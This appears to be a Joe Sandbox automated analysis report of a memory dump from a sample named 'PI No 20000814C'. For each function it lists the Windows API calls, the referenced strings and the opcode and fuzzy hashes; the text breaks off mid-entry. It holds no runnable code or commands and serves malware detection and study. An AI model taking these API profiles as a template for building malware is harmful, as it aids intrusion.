                                    • Instruction ID: ed8624958a723ef7a9009d4193daae7837375d082a62a8192574a4963b077a75
                                    • Opcode Fuzzy Hash: 78d1715ae2ae8bae478e86212a07aabc3ead31ce4f9024685c8b1507397e541c
                                    • Instruction Fuzzy Hash: DF5162716047009FD7119F28CC45B7A77E4EF88B20F14892AF559DB2E1DBB4D844BB42
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 00F6B73B
                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F6B7B1
                                    • GetLastError.KERNEL32 ref: 00F6B7BB
                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00F6B828
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Error$Mode$DiskFreeLastSpace
                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                    • API String ID: 4194297153-14809454
                                    • Opcode ID: 59efa5b527edee0bc6b5a94d4474dcdd363618d4ea5e7bb5f3cd53406b1c2ad5
                                    • Instruction ID: cd5751f3553c9aef5cb22c9108a17f165318caf97accc05fcebf4913f5930990
                                    • Opcode Fuzzy Hash: 59efa5b527edee0bc6b5a94d4474dcdd363618d4ea5e7bb5f3cd53406b1c2ad5
                                    • Instruction Fuzzy Hash: 7F318E35A00209AFDB10EF64DC89AFE7BB8EF84710F14402AE506D7292DB759986FB51
                                    APIs
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                      • Part of subcall function 00F5B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00F5B0E7
                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00F594F6
                                    • GetDlgCtrlID.USER32 ref: 00F59501
                                    • GetParent.USER32 ref: 00F5951D
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F59520
                                    • GetDlgCtrlID.USER32(?), ref: 00F59529
                                    • GetParent.USER32(?), ref: 00F59545
                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F59548
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 1536045017-1403004172
                                    • Opcode ID: 2a12fa35a5fb2bc3c54024119fa07cf3396696bd8a5e2d9666f3af53b5785ecd
                                    • Instruction ID: 956fcda83d5bb28ba56a4bff1542d95e8b133db074ac2d4733f37e54724013c0
                                    • Opcode Fuzzy Hash: 2a12fa35a5fb2bc3c54024119fa07cf3396696bd8a5e2d9666f3af53b5785ecd
                                    • Instruction Fuzzy Hash: A921E574E04208AFCF05AB61CC85DFEB7A4EF49310F104155BA21572E1EBB9591DBB20
                                    APIs
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                      • Part of subcall function 00F5B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00F5B0E7
                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00F595DF
                                    • GetDlgCtrlID.USER32 ref: 00F595EA
                                    • GetParent.USER32 ref: 00F59606
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F59609
                                    • GetDlgCtrlID.USER32(?), ref: 00F59612
                                    • GetParent.USER32(?), ref: 00F5962E
                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F59631
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 1536045017-1403004172
                                    • Opcode ID: ef4c254bdbf440266f7f26995ccb758a5396fdb6f754311c82046bd752562ef8
                                    • Instruction ID: f89a689ebcb3dc15a71d59c4c3e8efdfdfa9364f37592b40cfe0177fe3cc88b8
                                    • Opcode Fuzzy Hash: ef4c254bdbf440266f7f26995ccb758a5396fdb6f754311c82046bd752562ef8
                                    • Instruction Fuzzy Hash: 0321A475E04208BFDF05AB61CC85EFEBBA8EF48301F140155BA11972E1EBB9951DBB20
                                    APIs
                                    • GetParent.USER32 ref: 00F59651
                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00F59666
                                    • _wcscmp.LIBCMT ref: 00F59678
                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F596F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameParentSend_wcscmp
                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                    • API String ID: 1704125052-3381328864
                                    • Opcode ID: 1dd4d11adf835baeda4f7e2a382c954123a7ab5edeb44c85b694a5610628c894
                                    • Instruction ID: 73bce816443540f91429efd8544cbb1f227f12aec44391b656802bdda137216d
                                    • Opcode Fuzzy Hash: 1dd4d11adf835baeda4f7e2a382c954123a7ab5edeb44c85b694a5610628c894
                                    • Instruction Fuzzy Hash: 56110A7768C317FAFA152621EC06DE6779C8B05371F200127FF00A50D1FEE999187A59
                                    APIs
                                    • __swprintf.LIBCMT ref: 00F6419D
                                    • __swprintf.LIBCMT ref: 00F641AA
                                      • Part of subcall function 00F238D8: __woutput_l.LIBCMT ref: 00F23931
                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 00F641D4
                                    • LoadResource.KERNEL32(?,00000000), ref: 00F641E0
                                    • LockResource.KERNEL32(00000000), ref: 00F641ED
                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 00F6420D
                                    • LoadResource.KERNEL32(?,00000000), ref: 00F6421F
                                    • SizeofResource.KERNEL32(?,00000000), ref: 00F6422E
                                    • LockResource.KERNEL32(?), ref: 00F6423A
                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00F6429B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                    • String ID:
                                    • API String ID: 1433390588-0
                                    • Opcode ID: bbb0a69445e7ebf6b1369093cca3bff2423167a7f1b05629d3f9fd33de3c5564
                                    • Instruction ID: 108caac586ba99bbe20ef7c99ba82ee5871899eee316506aeb052d6002b9d7af
                                    • Opcode Fuzzy Hash: bbb0a69445e7ebf6b1369093cca3bff2423167a7f1b05629d3f9fd33de3c5564
                                    • Instruction Fuzzy Hash: 4731C1B1A0121AAFCB01AFA0ED59EFF7BACEF05301F144525F801D6150D734EA61EBA0
                                    APIs
                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F0FC06
                                    • OleUninitialize.OLE32(?,00000000), ref: 00F0FCA5
                                    • UnregisterHotKey.USER32(?), ref: 00F0FDFC
                                    • DestroyWindow.USER32(?), ref: 00F44A00
                                    • FreeLibrary.KERNEL32(?), ref: 00F44A65
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F44A92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                    • String ID: close all
                                    • API String ID: 469580280-3243417748
                                    • Opcode ID: ed7e005a9ca0a8c9f09830eb2ec68baae31124576fcec97e84ded5eab90b2184
                                    • Instruction ID: 5c4a78f4ffb6580ca0b715c76d55dd3e13e03386ae0340e0ec9bb95922f632fe
                                    • Opcode Fuzzy Hash: ed7e005a9ca0a8c9f09830eb2ec68baae31124576fcec97e84ded5eab90b2184
                                    • Instruction Fuzzy Hash: B2A15D31B012128FDB29EF14C895B69F764FF04710F5442ADE80AAB692DB34AD1AFF54
                                    APIs
                                    • EnumChildWindows.USER32(?,00F5AA64), ref: 00F5A9A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ChildEnumWindows
                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                    • API String ID: 3555792229-1603158881
                                    • Opcode ID: 306caca6ee8c6dd0912a758d1c4649c66bbb5b42b546a606d830679b114db38f
                                    • Instruction ID: ece07b33bdf12107ee5ca357c8a05d9d3231ccc7cde82ccf6ddde4891fa455db
                                    • Opcode Fuzzy Hash: 306caca6ee8c6dd0912a758d1c4649c66bbb5b42b546a606d830679b114db38f
                                    • Instruction Fuzzy Hash: FC91C671A00616DBDB08DF60C881BE9FB75BF04311F508219DE9AA7182DF34696EFB91
                                    APIs
                                    • SetWindowLongW.USER32(?,000000EB), ref: 00F02EAE
                                      • Part of subcall function 00F01DB3: GetClientRect.USER32(?,?), ref: 00F01DDC
                                      • Part of subcall function 00F01DB3: GetWindowRect.USER32(?,?), ref: 00F01E1D
                                      • Part of subcall function 00F01DB3: ScreenToClient.USER32(?,?), ref: 00F01E45
                                    • GetDC.USER32 ref: 00F3CF82
                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F3CF95
                                    • SelectObject.GDI32(00000000,00000000), ref: 00F3CFA3
                                    • SelectObject.GDI32(00000000,00000000), ref: 00F3CFB8
                                    • ReleaseDC.USER32(?,00000000), ref: 00F3CFC0
                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F3D04B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                    • String ID: U
                                    • API String ID: 4009187628-3372436214
                                    • Opcode ID: 1acecae5341f1e421a79fd3fe772afab3c4a43e3e6892c7c638445243d8ae5f7
                                    • Instruction ID: 340bdb1a25d90dc664f2871014707c9a7a2fe8a18511e7a70a0f9984798883c2
                                    • Opcode Fuzzy Hash: 1acecae5341f1e421a79fd3fe772afab3c4a43e3e6892c7c638445243d8ae5f7
                                    • Instruction Fuzzy Hash: 3D71B271900209DFCF258F64CC85ABA7BB6FF49370F14426AED55AA1AAC7318851FB60
                                    APIs
                                    • _memset.LIBCMT ref: 00F7F9C9
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F7FB5C
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F7FB80
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F7FBC0
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F7FBE2
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F7FD5E
                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F7FD90
                                    • CloseHandle.KERNEL32(?), ref: 00F7FDBF
                                    • CloseHandle.KERNEL32(?), ref: 00F7FE36
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                    • String ID:
                                    • API String ID: 4090791747-0
                                    • Opcode ID: 67c593f39a8240223d311a4cf8ca9810326a0705fb1f7ca7f6e916a4daacfd9a
                                    • Instruction ID: 3a37be9c15f6ad9d36805e3acde832df6d08ea01ab3939aaf727316d4d4ca7e0
                                    • Opcode Fuzzy Hash: 67c593f39a8240223d311a4cf8ca9810326a0705fb1f7ca7f6e916a4daacfd9a
                                    • Instruction Fuzzy Hash: 49E1C331604341DFC714EF24C891B6ABBE1BF84324F14846EF8999B2A2DB75DC49EB52
                                    APIs
                                      • Part of subcall function 00F01B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F02036,?,00000000,?,?,?,?,00F016CB,00000000,?), ref: 00F01B9A
                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00F020D3
                                    • KillTimer.USER32(-00000001,?,?,?,?,00F016CB,00000000,?,?,00F01AE2,?,?), ref: 00F0216E
                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00F3BEF6
                                    • DeleteObject.GDI32(00000000), ref: 00F3BF6C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                    • String ID:
                                    • API String ID: 2402799130-0
                                    • Opcode ID: e9ea8627636be6a9c8929a79044e9809a9905028ac8a64471eac61e7ec60b551
                                    • Instruction ID: 0e819f4e36e3e1122d17cda6da253e565436c13752dd88395cb6ab013612c8d7
                                    • Opcode Fuzzy Hash: e9ea8627636be6a9c8929a79044e9809a9905028ac8a64471eac61e7ec60b551
                                    • Instruction Fuzzy Hash: 28617932904714DFDB259F24DE59B2AB7F1FF40326F108529E542879A0C775A891FFA0
                                    APIs
                                      • Part of subcall function 00F648AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F638D3,?), ref: 00F648C7
                                      • Part of subcall function 00F648AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F638D3,?), ref: 00F648E0
                                      • Part of subcall function 00F64CD3: GetFileAttributesW.KERNEL32(?,00F63947), ref: 00F64CD4
                                    • lstrcmpiW.KERNEL32(?,?), ref: 00F64FE2
                                    • _wcscmp.LIBCMT ref: 00F64FFC
                                    • MoveFileW.KERNEL32(?,?), ref: 00F65017
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                    • String ID:
                                    • API String ID: 793581249-0
                                    • Opcode ID: 7bf50ba4836bc14b8704112b4a9e092e5a1a2003f8ca6f7846226e6427c673c8
                                    • Instruction ID: 27be1f8499281d9be422fa52fdc3e32c9e6da2c5b197b42713888f1ab958ee16
                                    • Opcode Fuzzy Hash: 7bf50ba4836bc14b8704112b4a9e092e5a1a2003f8ca6f7846226e6427c673c8
                                    • Instruction Fuzzy Hash: C45175B24087859BC764EB60DC819DFB3ECAF85711F10092EB189D3151EF78F688A766
                                    APIs
                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F8896E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: InvalidateRect
                                    • String ID:
                                    • API String ID: 634782764-0
                                    • Opcode ID: 9d743c9a091d2009f49b1497d02951e3a1e9bdde034b5ca36ced6a88da44145c
                                    • Instruction ID: c95b2155035ccb214fdf9a68de2ed218d1cbde9a1dfed5ec79fd76fcedfdcd88
                                    • Opcode Fuzzy Hash: 9d743c9a091d2009f49b1497d02951e3a1e9bdde034b5ca36ced6a88da44145c
                                    • Instruction Fuzzy Hash: 66518330A00208BFEF24AF24CC89BE97B65BF057A0FA04116F515E71E1DF75A986BB51
                                    APIs
                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00F3C547
                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F3C569
                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F3C581
                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00F3C59F
                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F3C5C0
                                    • DestroyCursor.USER32(00000000), ref: 00F3C5CF
                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F3C5EC
                                    • DestroyCursor.USER32(?), ref: 00F3C5FB
                                      • Part of subcall function 00F8A71E: DeleteObject.GDI32(00000000), ref: 00F8A757
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                                    • String ID:
                                    • API String ID: 2975913752-0
                                    • Opcode ID: f4e75dbf5424e45e60d4c91e9152297de1804f25caee43edf28ff163ff50f0d5
                                    • Instruction ID: db736b274cc52b5a80e949a063329c5655d4c31e9d0e5a267736b80172e21580
                                    • Opcode Fuzzy Hash: f4e75dbf5424e45e60d4c91e9152297de1804f25caee43edf28ff163ff50f0d5
                                    • Instruction Fuzzy Hash: 38513A71A00209AFDB64DF24CC49FAA77A5EB54760F104529F906A72D0DB70E990FBA0
                                    APIs
                                      • Part of subcall function 00F5AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F5AE77
                                      • Part of subcall function 00F5AE57: GetCurrentThreadId.KERNEL32 ref: 00F5AE7E
                                      • Part of subcall function 00F5AE57: AttachThreadInput.USER32(00000000,?,00F59B65,?,00000001), ref: 00F5AE85
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F59B70
                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F59B8D
                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00F59B90
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F59B99
                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F59BB7
                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F59BBA
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F59BC3
                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F59BDA
                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F59BDD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
